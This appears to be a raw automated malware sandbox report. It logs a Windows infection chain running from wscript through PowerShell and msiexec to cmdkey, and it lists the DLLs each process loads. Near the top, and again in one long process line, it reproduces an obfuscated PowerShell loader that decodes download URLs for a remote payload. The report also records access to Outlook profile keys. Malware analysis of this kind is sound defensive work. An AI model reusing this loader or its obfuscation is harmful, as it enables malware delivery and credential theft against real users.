erLSau OElanBHjemAT apLSkyg:Advio Oksp No.tHydrRUnfevU unL cceUdsvt Opp2E cr2Fors7Laud= H.r$ruelsI dvoOverYSoldBKorsEPunca prkN Abl.RvenStlpeptypolBetoIForetPaaf(,ekn$Unq kPutrnKittu klaLNondl.nami.oncnFibrG Vid)El e ');Furnage (Naturvrdi 'Stan[ CorNI che,angtOv r.TestSKo te ApprOm gV ridiAppecKrnieE tepBesgoAkmui Batn MiltUkrlM bacaSlannOphoaPolyG GkkeColpRHydr] ood:V gr: Ba SHogtEGramCSo oU,avnr.resiUndeTSympyYumaPI,terSkriO .agtSkreoU tac foroHammlPa.v Asc=Oplg Voic[SwilN.ilbePenkt in .Jap,S NuleImdeC dpaUUrsirUnfaiMissTDoo yInfiP T.ert ndOUndeT m,roCrazc K.lOCounLMou TReneYRuswP,ddeE yn]Neur:John:PaattPlumLR,acsEfte1Inte2F.os ');$Soybean=$Optrvlet227[0];$Afbrnde=(Naturvrdi 'Frek$ Un gUr nl BaloTetoBLimnASkolLEcze: .hikHeteaAwaksEnwik ForEBrutLPhonoKenit NegTAfb,eEarlrR.teNFor,EStubSReko=taenn Ceme Te WPart-Ve.dO
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeProcess created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"
          Source: C:\Windows\SysWOW64\cmdkey.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677eJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Versfods Pudser Ringmrknings Gonitis Recuperability Saggio Doceret #>;$Homoplasy='Stenkulsnaftas';<#Rejicer Amanuensiser Manticory #>;$Feminisere=$Oversalts+$host.UI; function Naturvrdi($unmannerliness){If ($Feminisere) {$varens++;}$Uenigst=$Etymologiserendes+$unmannerliness.'Length'-$varens; for( $Erhold=4;$Erhold -lt $Uenigst;$Erhold+=5){$Generationsprojekters=$Erhold;$Lucuma+=$unmannerliness[$Erhold];$Bergensisk='Costively';}$Lucuma;}function Furnage($Lokummet){ & ($Brneballet) ($Lokummet);}$Prereceived=Naturvrdi 'MaliM atio Hi,zSp.liFibrlBagmlTilkaExte/Rytt ';$Prereceived+=Naturvrdi ' Kyl5R,ek.Bran0neut Fo b(bereWAfm i QuanFl.ld BrsoEstawUnlusC ch AppeNSpheT et Howd1Enek0Him .Flle0 tje;Repr Oxy WC diiSkadnBesk6Abor4Call;Fors FastxStem6gav.4Phan;St.u Prodr KiovGdni: Ben1Grun3V sp1Su t.Land0St r)M,sc SupeGHandeCatac.uffkR cho Vau/Su c2 Car0 amp1Posi0Zirk0reg.1Fist0D ba1Vide F.anFSurviSengrMa,keRutef edeoEscaxLe b/Tild1incu3Para1Inde.Tryp0Brod ';$Teosofis=Naturvrdi 'M.deuSchnsMicrEbeboRSprn-TillaSandG hagE S.eNOpgatWaba ';$Soybean=Naturvrdi 'Reveh Fort.quat.usqpKultsPros:Pref/ Ko./UndewKat.wJazzw Uda.Sh,pgVermrP euoStoeuUdenpTh,or ambi S ea BrumPsyc.Ud ycPaapoPatemCopr/Fit.K P roiri,a ReplAfhji emtFeasiTermougr nLkkeeProprcyst.ComppUnsorBerrxId n>ArabhEmbltSarotKommp frssanti: Ent/Pu s/kalabS virDetau emtMo.sa.ent. iscp OlilMode/Be eKLeptoTe aaKruslcur.iFetct,araiEteroPourn OkkeCha rSi,h.CocrpSprkrtankx Mer>behnhlagdtRevatprofpSludsReso:Brug/Prop/ GeopOptar UndoPrepmTaviePrecnOps,t Lr eBerer dob.Actir IvesHaug/IrreKKineoPneua failTri,i RhatAnkei AveoSlatnveroeFeudrVeli.Sammpdownr .eixSnke ';$Knulling=Naturvrdi 'Geom>Bagg ';$Brneballet=Naturvrdi 'Hun iIncoeFri X Svu ';$Deposito='Kalkudsivning';$Mantelet70='\spgelseshistories.Hov';Furnage (Naturvrdi 'Wo l$ RecgR maLsab OHersBParaAHelll Ind:LotaPSpisR AutEOpskd ,irIOvercFrs,AplanBMainlFiskePres=Trai$ FrieLat nBrunVDumb:Ban a Bo pHelmpPr dDi aiA.ntrtTor A.arr+Cloa$dioxmMechADiviNUdd Ttr,ne dlglOptiEDybstR ne7Lnko0Tegn ');Furnage (Naturvrdi 'Smas$PercGO erLSau OElanBHjemAT apLSkyg:Advio Oksp No.tHydrRUnfevU unL cceUdsvt Opp2E cr2Fors7Laud= H.r$ruelsI dvoOverYSoldBKorsEPunca prkN Abl.RvenStlpeptypolBetoIForetPaaf(,ekn$Unq kPutrnKittu klaLNondl.nami.oncnFibrG Vid)El e ');Furnage (Naturvrdi 'Stan[ CorNI che,angtOv r.TestSKo te ApprOm gV ridiAppecKrnieE tepBesgoAkmui Batn MiltUkrlM bacaSlannOphoaPolyG GkkeColpRHydr] ood:V gr: Ba SHogtEGramCSo oU,avnr.resiUndeTSympyYumaPI,terSkriO .agtSkreoU tac foroHammlPa.v Asc=Oplg Voic[SwilN.ilbePenkt in .Jap,S NuleImdeC dpaUUrsirUnfaiMissTDoo yInfiP T.ert ndOUndeT m,roCrazc K.lOCounLMou TReneYRuswP,ddeE yn]Neur:John:PaattPlumLR,acsEfte1Inte2F.os ');$Soybean=$Optrvlet227[0];$Afbrnde=(Naturvrdi 'Frek$ Un gUr nl BaloTetoBLimnASkolLEcze: .hikHeteaAwaksEnwik ForEBrutLPhonoKenit NegTAfb,eEarlrR.teNFor,EStubSReko=taenn Ceme Te WPart-Ve.dOJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeProcess created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: winsqlite3.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: vaultcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: Binary string: ystem.Core.pdb7y~X source: powershell.exe, 00000006.00000002.2657649363.000000000769A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5A source: powershell.exe, 00000006.00000002.2657649363.00000000075E8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GJFjqeGumqI.exe, 0000000B.00000002.3467099503.0000000000C0E000.00000002.00000001.01000000.00000008.sdmp
          Source: Binary string: cmdkey.pdbGCTL source: msiexec.exe, 0000000A.00000003.3126312023.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.3126442250.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp, GJFjqeGumqI.exe, 0000000B.00000002.3467221616.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: msiexec.exe, 0000000A.00000003.3061903558.0000000021F0C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.3059333142.0000000021D5C000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000002.3468299948.000000000376E000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000003.3168090406.000000000326A000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000003.3170420691.000000000341E000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000002.3468299948.00000000035D0000.00000040.00001000.00020000.00000000.sdmp
